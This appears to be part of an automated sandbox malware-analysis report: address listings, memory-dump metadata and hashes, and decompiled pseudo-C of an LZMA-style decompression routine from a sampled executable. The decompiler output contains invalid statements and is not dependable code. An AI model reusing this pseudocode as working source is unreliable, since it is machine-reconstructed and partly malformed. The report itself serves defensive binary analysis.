                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8
                  0x00000000
                  0x0040640d

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                  • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                  • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                  • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
